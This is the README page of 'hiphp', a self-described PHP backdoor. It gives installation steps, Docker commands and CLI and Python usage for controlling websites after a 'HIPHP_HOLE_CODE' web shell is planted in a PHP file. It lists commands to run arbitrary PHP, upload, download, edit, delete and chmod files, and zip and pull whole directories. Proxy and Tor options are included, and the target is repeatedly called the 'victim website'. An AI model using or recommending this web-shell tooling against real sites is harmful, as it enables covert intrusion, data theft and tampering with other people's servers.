Skip to content

The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files, tokens and commands through port 80's POST/GET method, users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.

License

Notifications You must be signed in to change notification settings

yasserbdj96/hiphp

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation


hiphp by yasserbdj96

Hiphp

Free & Open source project for create a BackDoor to control PHP-based sites.

Run on Ubuntu Run on Windows Run on MacOS Test Requirements on Windows Test Requirements on Ubuntu PYPI Build & Setup On Ubuntu PYPI Build & Setup On MacOS PYPI Build & Setup On Windows Build .deb Install On Ubuntu Push To Docker Push To Github Container Registry Push To PYPI hiphp-desktop In Colab Deploy static content to Pages CodeQL CodeFactor Size total_code_lines languages Supported Versions Visitors Hits Docker pulls Downloads Stars Forks Watching GitHub contributors GitHub closed issues GitHub pull requests GitHub release (latest by date) GitHub commit activity GitHub license Open Source OpenSSF Best Practices wakatime Join the chat at https://gitter.im/yasserbdj96/hiphp


What is Hiphp?

The HIPHP BackDoor is an open-source tool that allows for remote control of websites utilizing the PHP programming language via the HTTP/HTTPS protocol. By utilizing the POST/GET method on port 80, users can access a range of functionalities such as file downloading and editing. Additionally, it offers the capability to connect to Tor networks, providing an added layer of security through the use of password protection.

Developed by a team of webmasters who wanted to provide greater control over their sites without relying on third-party software or services, HIPHP is a simple and user-friendly solution. By placing the HIPHP_HOLE_CODE in any PHP file within the site’s directory structure, users are granted access rights to make changes from anywhere in the world. This makes it an ideal solution for website owners looking for greater flexibility when managing their online presence.

Security is a top priority for HIPHP, with regular updates ensuring compatibility across different versions of PHP codebase used by popular content management systems (CMS). Its password protection feature adds an additional layer of defense against unauthorized access. HIPHP is a secure solution for those looking to take back full control over their website hosting environment.


Table of Contents:


Demo:


How do you use this version of the project?

[✓] Command Line Interface (CLI).
[✓] Graphical User Interface (GUI).
[✓] Web Application.
[✓] Python Package.
[✓] Script.
[✓] Docker Container.

All languages used in this project:

* Python3
* PHP
* Shell (Bash)
* Shell (Batch)
* JavaScript
* CSS
* HTML

Where can you find this project?

[✓] https://pypi.org/project/hiphp/
[✓] https://hub.docker.com/r/yasserbdj96/hiphp
[✓] https://github.com/yasserbdj96/hiphp
[✓] Github Packages
[✓] https://gitlab.com/yasserbdj96/hiphp

How to download?

# Download hiphp from github:
❯ git clone https://github.com/yasserbdj96/hiphp.git
# OR
# Download hiphp from gitlab:
❯ git clone https://gitlab.com/yasserbdj96/hiphp.git

Used Requirements:

[✓] requests
[✓] hexor
[✓] biglibrary
[✓] tk
[✓] eel
[✓] readline
[✓] chardet

Supported Distributions:

Distribution Version Check Python Version Installation hiphp-cli hiphp-desktop hiphp-tk
Ubuntu Last version 3.7 --> 3.11
Windwos Last version 3.7 --> 3.11
MacOS Last version 3.7 --> 3.10
Android-termux Last version 3.7 --> 3.9
Nethunter Last version 3.7 --> 3.9

HIPHP_HOLE_CODE

Get your own HIPHP_HOLE_CODE:

# HIPHP_HOLE_CODE:
❯ python main.py --geth --key=123

HIPHP_HOLE_CODE Example:

hiphp by yasserbdj96

Hiphp with Docker:

Docker pull build and run:

# Build:
❯ docker build -t hiphp:latest .

# Run as CLI:
❯ docker run -e KEY="<KEY*>" -e URL="<URL*>" -i -t hiphp:latest

# Run as CLI with PROXIES:
❯ docker run -e KEY="<KEY>" -e URL="<URL>" -e PROXIES="<FILE_PATH/{'http/https':'IP:port'}>" -i -t hiphp:latest

# Run as GUI:
❯ docker run --rm -p 127.0.0.1:8080:8080 -e DOCKER=True -e DST=True -i -t hiphp:latest
# Open your web browser and navigate to http://127.0.0.1:8080 to see the default landing page.

# *     = All inputs must be entered.
# KEY   = The password used for encrypt HIPHP_HOLE_CODE.
# URL   = Victim website link.

click to see Demo



Docker Hub pull build and run:

# Pull:
❯ docker pull yasserbdj96/hiphp:latest

# Build:
❯ docker build -t docker.io/yasserbdj96/hiphp:latest .

# Run as CLI:
❯ docker run -e KEY="<KEY*>" -e URL="<URL*>" -i -t docker.io/yasserbdj96/hiphp:latest

# Run as CLI with PROXIES:
❯ docker run -e KEY="<KEY>" -e URL="<URL>" -e PROXIES="<FILE_PATH/{'http/https':'IP:port'}>" -i -t docker.io/yasserbdj96/hiphp:latest

# Run as GUI:
❯ docker run --rm -p 127.0.0.1:8080:8080 -e DOCKER=True -e DST=True -i -t docker.io/yasserbdj96/hiphp:latest
# Open your web browser and navigate to http://127.0.0.1:8080 to see the default landing page.

# *     = All inputs must be entered.
# KEY   = The password used for encrypt HIPHP_HOLE_CODE.
# URL   = Victim website link.

click to see Demo



GitHub container registry pull build and run:

# Pull:
❯ docker pull ghcr.io/yasserbdj96/hiphp:latest

# Build:
❯ docker build -t ghcr.io/yasserbdj96/hiphp:latest .

# Run as CLI:
❯ docker run -e KEY="<KEY*>" -e URL="<URL*>" -i -t ghcr.io/yasserbdj96/hiphp:latest

# Run as CLI with PROXIES:
❯ docker run -e KEY="<KEY>" -e URL="<URL>" -e PROXIES="<FILE_PATH/{'http/https':'IP:port'}>" -i -t ghcr.io/yasserbdj96/hiphp:latest

# Run as GUI:
❯ docker run --rm -p 127.0.0.1:8080:8080 -e DOCKER=True -e DST=True -i -t ghcr.io/yasserbdj96/hiphp:latest
# Open your web browser and navigate to http://127.0.0.1:8080 to see the default landing page.

# *     = All inputs must be entered.
# KEY   = The password used for encrypt HIPHP_HOLE_CODE.
# URL   = Victim website link.

click to see Demo



Installation:

Python Package Installation:

# Install from PYPI:
❯ pip install hiphp
# OR
❯ python -m pip install hiphp

# Local install:
# Download hiphp from github:
❯ git clone https://github.com/yasserbdj96/hiphp.git
# OR
# Download hiphp from gitlab:
❯ git clone https://gitlab.com/yasserbdj96/hiphp.git
# Go to downloaded folder:cd hiphp
# install
#❯ pip install -r requirements.txt
❯ pip install .

# Uninstall:
❯ pip uninstall hiphp

Ubuntu-Nethunter Installation:

# Download hiphp from github:
❯ git clone https://github.com/yasserbdj96/hiphp.git
# OR
# Download hiphp from gitlab:
❯ git clone https://gitlab.com/yasserbdj96/hiphp.git

# Go to downloaded folder:cd hiphp

# Go to Installation folder:cd install

# Install:
# If you encounter problems with installation and operation, please repeat the process by giving root permission.
❯ bash install.sh --install
❯ hiphp

# Update:
❯ bash install.sh --update

# Usage: hiphp [OPTION]

# Examples:
#         hiphp --help                  # Show CLI help for hiphp.
#         hiphp --geth [KEY] [URL]      # Retrieve the HIPHP_HOLE_CODE encrypted by your [KEY].
#         hiphp [KEY] [URL]             # Connect to the victim's website in CLI mode.
#         hiphp --tk                    # Run hiphp in 'hiphp-tk' (GUI) mode.
#         hiphp --dst                   # Run hiphp in 'hiphp-desktop' (GUI) mode.
#         hiphp --version               # Check the current version number.

# Uninstall:
❯ bash install.sh --uninstall

Termux Installation:

# Download hiphp from github:
❯ git clone https://github.com/yasserbdj96/hiphp.git
# OR
# Download hiphp from gitlab:
❯ git clone https://gitlab.com/yasserbdj96/hiphp.git

# Go to downloaded folder:cd hiphp

# Go to Installation folder:cd install

# Install:
❯ bash install.sh --termux --install
❯ hiphp

# Update:
❯ bash install.sh --termux --update

# Usage: hiphp [OPTION]

# Examples:
#         hiphp --help                  # Show CLI help for hiphp.
#         hiphp --geth [KEY] [URL]      # Retrieve the HIPHP_HOLE_CODE encrypted by your [KEY].
#         hiphp [KEY] [URL]             # Connect to the victim's website in CLI mode.
#         hiphp --version               # Check the current version number.

# Uninstall:
❯ bash install.sh --termux --uninstall

Debian Build and Installation:

# Download hiphp from github:
❯ git clone https://github.com/yasserbdj96/hiphp.git
# OR
# Download hiphp from gitlab:
❯ git clone https://gitlab.com/yasserbdj96/hiphp.git

# Go to downloaded folder:cd hiphp

# build .deb file:
❯ bash build_deb.sh

# Install:
❯ sudo dpkg -i hiphp-<VERSION>.deb
# OR
❯ sudo apt install ./hiphp-<VERSION>.deb

Run without installation:

Run with hiphp-cli:

# Download hiphp from github:
❯ git clone https://github.com/yasserbdj96/hiphp.git
# OR
# Download hiphp from gitlab:
❯ git clone https://gitlab.com/yasserbdj96/hiphp.git

# Go to downloaded folder:cd hiphp

# install requirements:
❯ pip install -r requirements.txt
❯ pip install -r hiphp-linux/requirements-linux.txt #for linux os.
❯ pip install -r hiphp-win/requirements-win.txt #for windows os.

# default run on any os:
❯ python main.py --KEY="<KEY*>" --URL="<URL*>"

# Run with Makefile:
❯ make ARGUMENTS="--KEY='<KEY*>' --URL='<URL*>'" run

# For linux:cd hiphp-linux
❯ bash hiphp-cli.sh --KEY="<KEY*>" --URL="<URL*>" --PROXIES="<FILE_PATH/{'http/https':'IP:port'}>" --Y

# For Windows:
# Do not forget to modify the "config.ini" file or use the following command:
# > python -c "import sys; open('config.ini','w+').write('python_default_path='+sys.executable)"
# OR Run 'hiphp-win\config-configure.py'.cd hiphp-win
❯ hiphp-cli.bat --KEY="<KEY*>" --URL="<URL*>" --PROXIES="<FILE_PATH/{'http/https':'IP:port'}>" --Y

Help for hiphp-cli:
Commands:

  --help, help                       # Display this help.
  --help [ACTIONS], help [ACTIONS]   # Help for a specific command.
  --geth, geth                       # Get the HIPHP_HOLE_CODE (same purpose as --geth).
  --phpinfo, phpinfo                 # Display information about the server.
  --cls, cls                         # Clear the console.
  --exit, exit                       # Exit the console.

Actions:

  --ls, ls                           # List files and folders (current directory by default).
  Usage: --ls [OPTION] [PATH], ls [OPTION] [PATH]
    --ls                             # List all files and folders in the current directory.
    --ls [PATH]                      # List all files and folders in the specified directory.
    --ls -all                        # List all files, folders, and subfolders in the current directory.
    --ls -all [PATH]                 # List all files, folders, and subfolders in the specified directory.

  --cat, cat                         # Concatenate a file to standard output.
  Usage: --cat [FILE_PATH]

  --set, set                         # Create a code snippet that is always saved during work.
  Usage: --set [PHP_CODE]
  To reset to the initial value, use "--dset" or "dset".

  --cd, cd                           # Change directory.
  Usage: --cd [PATH]

  --rf, rf, run                      # Run code from a file.
  Usage: --rf [FILE_PATH] [VARIABLES]
    --rf [FILE_PATH]                 # Run code from a file.
    --rf [FILE_PATH] [VARIABLES]     # Run code from a file with variables (e.g., --rf example.php var==hello).
  
  --up, up, upload                   # Upload a file.
  Usage: --up [FILE_PATH] [PATH]
    --up [FILE_PATH]                 # Upload a file to the current directory.
    --up [FILE_PATH] [PATH]          # Upload a file to a specified directory.

  --down, down, download             # Download a file.
  Usage: --down [-f/-d] [FILE/DIR_PATH] [OUT_PATH]
    --down -f [FILE_PATH]            # Download a file to the current directory.
    --down -f [FILE_PATH] [OUT_PATH] # Download a file to a specified directory.
    --down -d [DIR_PATH]             # Download a folder to the current directory.
    --down -d [DIR_PATH] [OUT_PATH]  # Download a folder to a specified directory.
    --down -all                      # Download all files to the current directory.
    --down -all [OUT_PATH]           # Download all files to a specified directory.

  --zip, zip                         # Compress a directory.
  Usage: --zip [DIR_PATH]
    --zip                            # Compress the current directory.
    --zip [DIR_PATH]                 # Compress a specific directory.

  --edt, edt, edit                   # Edit files.
  Usage: --edt [FILE_PATH]
    CTRL+q                           # Exit the editor.
    CTRL+s                           # Save the changes.

  --rm, rm, delete                   # Delete files and folders.
  Usage: --rm [-f/-d] [FILE/DIR_PATH]
    --rm -f [FILE_PATH]              # Delete a file.
    --rm -d [DIR_PATH]               # Delete a folder.

  --mv, mv                           # Move files and folders.
  Usage: --mv [SOURCE] [DESTINATION]

  --chmod, chmod                     # change file/folder permissions
  Usage: --chmod [PERMISSIONS] [FILE/DIR_PATH]

About:

  --update, update                   # Check for updates.
  --license, license                 # View the project license.
  --about, about                     # About this project.
  --version, version                 # Get the current version number.

Run with hiphp-desktop:

# Download hiphp from github:
❯ git clone https://github.com/yasserbdj96/hiphp.git
# OR
# Download hiphp from gitlab:
❯ git clone https://gitlab.com/yasserbdj96/hiphp.git

# Go to downloaded folder:cd hiphp

# install requirements:
❯ pip install -r requirements.txt
❯ pip install -r hiphp-linux/requirements-linux.txt #for linux os.
❯ pip install -r hiphp-win/requirements-win.txt #for windows os.

# run with hiphp-desktop tool:
❯ python main.py --DST

# Run with Makefile:
❯ make ARGUMENTS="--DST" run
# Open your web browser and navigate to http://127.0.0.1:8080 to see the default landing page.

# For Linux:cd hiphp-linux
❯ bash hiphp-desktop.sh
# Open your web browser and navigate to http://127.0.0.1:8080 to see the default landing page.

# For Windows:
# Do not forget to modify the "config.ini" file or use the following command:
# > python -c "import sys; open('config.ini','w+').write('python_default_path='+sys.executable)"
# OR Run 'hiphp-win\config-configure.py'.cd hiphp-win
❯ hiphp-desktop.bat
# Open your web browser and navigate to http://127.0.0.1:8080 to see the default landing page.

Run hiphp-desktop In Colab:
Open hiphp-desktop In Colab

Run with hiphp-tk:

# Download hiphp from github:
❯ git clone https://github.com/yasserbdj96/hiphp.git
# OR
# Download hiphp from gitlab:
❯ git clone https://gitlab.com/yasserbdj96/hiphp.git

# Go to downloaded folder:cd hiphp

# install requirements:
❯ pip install -r requirements.txt
❯ pip install -r hiphp-linux/requirements-linux.txt #for linux os.
❯ pip install -r hiphp-win/requirements-win.txt #for windows os.

# run with hiphp-tk tool:
❯ python main.py --TK

# Run with Makefile:
❯ make ARGUMENTS="--TK" run
# OR
❯ make ARGUMENTS="--TK --KEY='<KEY>' --URL='<URL>'" run

# For Linux:cd hiphp-linux
❯ bash run-hiphp-tk.sh

# For Windows:
# Do not forget to modify the "config.ini" file or use the following command:
# > python -c "import sys; open('config.ini','w+').write('python_default_path='+sys.executable)"
# OR Run 'hiphp-win\config-configure.py'.
❯ hiphp-win
❯ run-hiphp-tk.bat

Use hiphp As Script:

Script Usage:

# install hiphp package:
# ❯ pip install hiphp

# import hiphp package:
from hiphp import *

# Connect:
p1=hiphp(key="<KEY*>",url="<URL*>",proxies="<PROXIES>",retu=<RETURN>)# Default: retu=False

# *       = All inputs must be entered.
# KEY     = The password used for encrypt HIPHP_HOLE_CODE.
# URL     = Victim website link.
# PROXIES = To use a proxy.
# RETURN  = True for return data as a string, false for print data in the console.

Script Examples:

#START{
from hiphp import *

# Connect:
p1=hiphp(key="123",url="http://127.0.0.1/index.php")#Default: retu=False, proxies="".
#p1=hiphp(key="123",url="http://kfdjlkgjflkgjdfkjgkfdjgkjdfkgjk.onion/index.php")# If you use hiphp on .onion sites, you must run tor services or tor browser.
#p1=hiphp(key="123",url="https://localhost.com/vvv2.php")


# Get the hole Code:
p1.get_hole()# Copy this code into the file whose path you entered earlier. ex: https://localhost/index.php

# Example:1
# Command:
p1.run("echo 'this is a test';")

# Example:2
# Run code from file:
p1.run_file("./examples.php")# Run code from file.
p1.run_file("./examples.php","var1==true","var2==hiii")# Run code from file With the entry of variables.

# Example:3
# Upload a file:
p1.upload("./examples.php")# Upload a file to the current directory.
p1.upload("./examples.php","./upload_path/")# Upload a file to a specific directory.

# Example:4
# Compress a path:
p1.compress()# Compress the current directory.
p1.compress("./example/")# Compress a specific directory.

# Example:5
# download a file:
p1.download("example.zip")# download a specific file to the current directory.
p1.download("example.zip","<OUT_PATH>")# download a specific file to specific directory.

# Example:6
# Command line interface:
p1.cli()
#}END.

Screenshots:


Changelog History:

Click to See changelog History

Limitations:

1. When you use hiphp for the first time on a site, the code HIPHP_HOLE_CODE will show you, copy it and upload it to the path you want to connect to, for example 'https://localhost/inc/example.php'.
2. In order for hiphp to work well and without errors, HIPHP_HOLE_CODE must be placed at the top of the target file.
3. hiphp will not work and it will show you a message stating that you are unable to connect to the site if you do not enter the correct path to the location of HIPHP_HOLE_CODE via the link.
4. If you use hiphp on .onion sites, you must run tor services or tor browser.
5. If you are a Windows user, you must modify the "config.ini" file.
6. I AM NOT RESPONSIBLE HOW YOU USE MY TOOLS/PROGRAMS/PROJECTS. BE LEGAL AND NOT STUPID.

Development By:

Developer / Author: yasserbdj96


License:

The content of this repository is bound by the following LICENSE.


Support:

If you enjoy this project and would like to see it continue to improve, or if you would like me to create more interesting projects, please consider sponsoring me.



website . github . gitlab . linkedin . twitter . instagram . facebook . youtube . pypi . docker . telegram . gitter . e-mail . sponsor

About

The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files, tokens and commands through port 80's POST/GET method, users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.

Topics

Resources

License

Code of conduct

Security policy

Stars

Watchers

Forks

Sponsor this project

 

Packages